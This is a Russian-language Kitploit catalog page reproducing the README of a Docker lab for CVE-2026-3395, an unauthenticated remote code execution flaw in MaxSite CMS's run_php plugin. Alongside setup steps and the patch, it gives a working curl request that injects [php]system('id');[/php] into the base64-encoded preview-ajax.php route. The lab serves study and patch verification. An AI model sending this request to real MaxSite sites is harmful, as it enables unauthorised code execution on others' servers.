Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/rootdirective-sec/cve-2026-3395-lab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubrootdirective-sec/cve-2026-3395-lab

CVE-2026-3395-Lab

Образовательная Docker-лаборатория, демонстрирующая CVE-2026-3395 — неаутентифицированное удалённое выполнение кода (RCE) в MaxSite CMS через плагин run_php, с уязвимым и исправленным окружениями для безопасного воспроизведения и анализа.

Репозиторий
15 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-3395 — Лаборатория неаутентифицированного RCE в MaxSite CMS

Этот репозиторий предназначен только для образовательных и исследовательских целей. Все тестирование должно проводиться в локальной среде Docker-лаборатории. Не разворачивайте эту конфигурацию на публичных или производственных системах.


Краткое описание

CVE-2026-3395 затрагивает MaxSite CMS и позволяет неаутентифицированный доступ к административной AJAX-конечной точке. Когда плагин run_php включён, пользовательский ввод может быть выполнен как PHP-код через систему хуков CMS, что может привести к удалённому выполнению кода (RCE).

Этот репозиторий включает:

  • Уязвимую сборку (коммит до исправления)
  • Исправленную сборку (коммит после исправления)
  • Docker-лабораторию для воспроизведения
  • Безопасную демонстрацию подтверждения воздействия

Обзор уязвимости

Уязвимая конечная точка расположена по адресу:

root@kitploit:~
application/maxsite/admin/plugins/editor_markitup/preview-ajax.php

В уязвимой версии:

  • К конечной точке можно получить доступ без аутентификации
  • Пользовательский ввод (POST data) передаётся через mso_hook()
  • Плагин run_php обрабатывает блоки [php]...[/php]
  • Плагин выполняет заключённый код с помощью eval()

Если run_php включён, это приводит к неаутентифицированному удалённому выполнению кода.

Исправленная версия добавляет:

root@kitploit:~
if (!is_login()) die('no login');
mso_checkreferer();

Это ограничивает доступ только аутентифицированными пользователями.


Настройка Docker-лаборатории

Эта лаборатория создаёт две среды:

СредаПорт
Уязвимая8081
Исправленная8082

Требования

  • Docker
  • Docker Compose v2

1. Сборка и запуск

root@kitploit:~
docker compose up -d --build

Это позволит:

  • Собрать оба образа
  • Запустить базы данных
  • Автоматически запустить установщик CMS
  • Включить run_php в конфигурации лаборатории

2. Проверка установки

Откройте в браузере:

root@kitploit:~
http://localhost:8081  (Уязвимая)
http://localhost:8082  (Исправленная)

Оба экземпляра должны успешно загрузиться.

Лаборатория запущена


Подтверждение уязвимости (только лаборатория)

AJAX-маршрут использует путь в кодировке base64.

Base64 от:

root@kitploit:~
admin/plugins/editor_markitup/preview-ajax.php

равен:

root@kitploit:~
YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==

Тест уязвимого экземпляра

root@kitploit:~
curl -X POST "http://localhost:8081/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Referer: http://localhost:8081/" \
  --data-urlencode "data=[php]system('id');[/php]"

Вывод RCE на уязвимом экземпляре


Тест исправленного экземпляра

root@kitploit:~
curl -X POST "http://localhost:8082/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Referer: http://localhost:8082/" \
  --data-urlencode "data=[php]system('id');[/php]"

Ожидаемый результат:

root@kitploit:~
no login

Контроль доступа на исправленном экземпляре


Остановка лаборатории

Чтобы остановить контейнеры:

root@kitploit:~
docker compose down -v

Отказ от ответственности

Используйте этот проект только в изолированных средах для исследовательских и учебных целей.


Ссылки

  • Публичный разбор: https://github.com/mbanyamer/CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE/
  • Запись в VulDB: https://vuldb.com/?submit.762169
  • Официальный коммит с исправлением: https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
Скачать инструмент